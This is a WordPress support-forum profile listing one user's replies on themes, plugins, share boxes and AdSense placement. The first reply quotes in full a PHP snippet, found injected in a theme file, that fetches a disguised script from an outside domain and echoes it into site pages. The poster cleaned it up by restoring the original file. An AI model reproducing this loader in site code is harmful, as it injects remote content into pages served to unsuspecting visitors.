Juan Rangel
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: I am getting errors appearing on header.I was having this problem but seem to have fixed it. I read somewhere to comment out
<?php if(function_exists('curl_init')) { $url = "https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } ?>
I tried that, but it just caused a lot more problems. That piece of code was in my update-notifier.php file so I ended up just grabbing the original from my rar file and it cleared everything up. Hope this helps
Forum: Fixing WordPress
In reply to: how to display total views of all postsI use jetpack and google analytics to keep track of stats.
Forum: Fixing WordPress
In reply to: How do I fix my Portfolium static page/homepage?You may need to set the homepage up with a homepage template. Edit page>Page Attributes
Forum: Fixing WordPress
In reply to: How to remove a share boxhttps://www.ads-software.com/extend/plugins/add-to-any/ This one is awesome.
Forum: Fixing WordPress
In reply to: How to remove a share boxCheck and see if you still have a sharedaddy plugin installed.
Forum: Fixing WordPress
In reply to: How to remove a share boxIS this a plugin? If it is, just deactivate it.
Plugin called sharedaddy?I use to do this manually. choose where you want to end your summary and in html view add <!–more–>
Check this out
https://codex.www.ads-software.com/Customizing_the_Read_MoreForum: Fixing WordPress
In reply to: Styling Nav MenuAlso I am wanting to add an image under the firs as well. To get an idea look here https://www.youngwebbuilder.com/getstarted/
Forum: Fixing WordPress
In reply to: Next page of postThat doesn’t seem to work. I get no nav links.
Forum: Fixing WordPress
In reply to: Need help centering adsense code`<div align = “center”>
<script type=”text/javascript”><!–
google_ad_client = “#”;
/* Header Ad */
google_ad_slot = “#”;
google_ad_width = 728;
google_ad_height = 90;
//–>
</script>
<script type=”text/javascript”
src=”#”>
</script>
</div>’This is the exact code I use in my widget text area. I just center each ad. I don’t bother messing with the .css file
Forum: Your WordPress
In reply to: TheModern-Nerd.comThank you for your comment and I appreciate your subscription.
I like your site. Love the little character. haha
If you are interested in building some links let me know.